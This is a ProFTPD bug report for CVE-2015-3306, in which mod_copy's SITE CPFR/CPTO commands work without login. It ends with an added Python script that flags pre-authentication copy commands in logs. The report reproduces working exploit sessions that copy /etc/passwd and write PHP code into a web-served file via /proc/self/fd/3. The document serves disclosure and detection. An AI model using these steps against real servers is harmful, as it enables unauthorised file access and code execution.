Bug 4169 - Unauthenticated copying of files via SITE CPFR/CPTO allowed by mod_copy
Status: CLOSED FIXED
Product: ProFTPD
Component: mod_copy
Version: 1.3.5
Platform: All All
Importance: P2 critical
Assigned To: TJ Saunders
Keywords: Backport
Reported: 2015-04-07 16:35 UTC by TJ Saunders
Modified: 2015-05-28 05:59 UTC

Description TJ Saunders 2015-04-07 16:35:03 UTC
Vadim Melihow reported a critical issue with proftpd installations that use the
mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands
to be used by *unauthenticated clients*:

---------------------------------
Trying 80.150.216.115...
Connected to 80.150.216.115.
Escape character is '^]'.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
214-CPFR <sp> pathname
214-CPTO <sp> pathname
214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path
214-SYMLINK <sp> source <sp> destination
214-RMDIR <sp> path
214-MKDIR <sp> path
214-The following SITE extensions are recognized:
214-RATIO -- show all ratios in effect
214-QUOTA
214-HELP
214-CHGRP
214-CHMOD
214 Direct comments to root@www01a
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto /tmp/passwd.copy
250 Copy successful
-----------------------------------------

He provides another, scarier example:

------------------------------
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
350 File or directory exists, ready for destination name
site cpto /var/www/test.php

test.php now contains
----------------------
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q
(slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php
phpinfo(); ?>' for copying: Permission denied
-----------------------

test.php contains the correct php script "<?php phpinfo(); ?>" which
can be run by the php interpreter

Comment 1 TJ Saunders 2015-04-07 16:42:03 UTC
Pull request to fix the issue, and to provide a CopyEngine directive, so that
future mod_copy issues can be mitigated by disabling the module at runtime,
without requiring recompiling:

  https://github.com/proftpd/proftpd/pull/109

Comment 2 TJ Saunders 2015-04-07 16:55:31 UTC
Merged to master, and backported to 1.3.5 branch.

Comment 3 TJ Saunders 2015-04-15 17:53:08 UTC
This was assigned CVE-2015-3306.

Comment 4 TJ Saunders 2015-05-28 05:59:40 UTC
Resolved in 1.3.5a, 1.3.6rc1.
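
A log-side check for the behaviour reported in this bug, as an added example that is not part of the bug thread or of ProFTPD's code: it walks per-session command logs and reports SITE CPFR/CPTO commands issued before a successful login. The log layout (session id, client address, quoted command, reply code), the names find_preauth_copies and SAMPLE_LOG, and all sample lines are assumptions constructed for the example.

```python
import re
from collections import namedtuple

# Assumed (constructed) log layout, one FTP command per line:
#   <session-id> <client-ip> "<FTP command>" <reply-code>
LINE_RE = re.compile(r'^(\S+) (\S+) "(.*)" (\d{3})$')
COPY_RE = re.compile(r'^SITE\s+(CPFR|CPTO)\b\s*(.*)$', re.IGNORECASE)

Finding = namedtuple("Finding", "session client verb path code accepted")

def find_preauth_copies(lines):
    """Return SITE CPFR/CPTO commands seen before a successful login."""
    authed = set()  # sessions that have received a 230 reply to USER/PASS
    findings = []
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # not in the assumed layout
        session, client, command, code = m.groups()
        verb = command.split(" ", 1)[0].upper()
        if verb in ("USER", "PASS") and code == "230":
            authed.add(session)
            continue
        if verb == "REIN":  # session reinitialised: login state is dropped
            authed.discard(session)
            continue
        c = COPY_RE.match(command)
        if c and session not in authed:
            accepted = code[0] in "23"  # 350 after CPFR, 250 after CPTO
            findings.append(Finding(session, client, c.group(1).upper(),
                                    c.group(2), code, accepted))
    return findings

# Constructed sample: an unauthenticated copy, a normal logged-in copy,
# and a refused pre-login attempt (reply code chosen for the sample).
SAMPLE_LOG = """\
16255 192.0.2.10 "SITE CPFR /etc/passwd" 350
16255 192.0.2.10 "SITE CPTO /tmp/passwd.copy" 250
16301 192.0.2.20 "USER alice" 331
16301 192.0.2.20 "PASS (hidden)" 230
16301 192.0.2.20 "SITE CPFR /home/alice/a.txt" 350
16301 192.0.2.20 "SITE CPTO /home/alice/b.txt" 250
16340 192.0.2.30 "site cpfr /etc/passwd" 530
""".splitlines()

if __name__ == "__main__":
    for f in find_preauth_copies(SAMPLE_LOG):
        state = "ACCEPTED" if f.accepted else "refused"
        print(f"{f.client} session {f.session}: pre-auth SITE {f.verb} "
              f"{f.path} -> {f.code} ({state})")
```

Findings with accepted set mean the server carried out the copy for a client that never logged in; refused ones still show a client trying the commands before authentication.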